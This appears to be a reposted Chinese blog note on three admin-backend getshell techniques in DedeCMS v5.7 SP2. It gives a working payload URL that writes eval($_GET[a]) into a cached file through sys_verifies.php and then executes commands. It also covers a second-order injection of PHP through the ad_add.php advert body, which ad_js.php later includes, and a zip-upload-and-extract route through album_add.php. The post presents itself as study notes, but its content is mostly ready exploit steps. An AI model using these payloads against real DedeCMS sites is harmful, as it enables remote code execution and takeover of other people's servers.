dedecms v5.7 sp2 三處經典后台getshell


1、通過fopen/fwrite配合require_once文件包含進行getshell

D:\phpstudy_pro\WWW\dede\dede\sys_verifies.php

payload:http://dede.com/dede/sys_verifies.php?action=getfiles&refiles[0]=123&refiles[1]=\%22;eval($_GET[a]);die();//

此處進行文件包含,最終導致getshell

http://dede.com/dede/sys_verifies.php?action=down&a=echo 'zpchcbd';

類似的漏洞還有:D:\phpstudy_pro\WWW\dede\dede\stepselect_main.php 中的WriteEnumsCache函數

2、二次注入導致的getshell

D:\phpstudy_pro\WWW\dede\dede\ad_add.php

進行廣告添加的時候,其中$normbody變量是我們可以可控,這里直接寫入的內容為--><?php phpinfo()?><!--

后面發現會進行取出,如果看從哪里取出呢?全局搜索#@__myad,這個表的相關操作

D:\phpstudy_pro\WWW\dede\plus\ad_js.php,發現在這會進行取出,並且進行文件包含,--> <!-- 就是為了閉合操作

然后訪問:http://dede.com/plus/ad_js.php?aid=3,這里我的廣告id為3

直接命令執行

3、壓縮包上傳解壓導致的getshell

隨意上傳一個附件:http://dede.com/uploads/soft/200420/1_2312144661.zip

訪問:http://dede.com/dede/album_add.php,進行解壓操作!

這三種都是經典的后台getshell的方法,在這里學習記錄下!


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM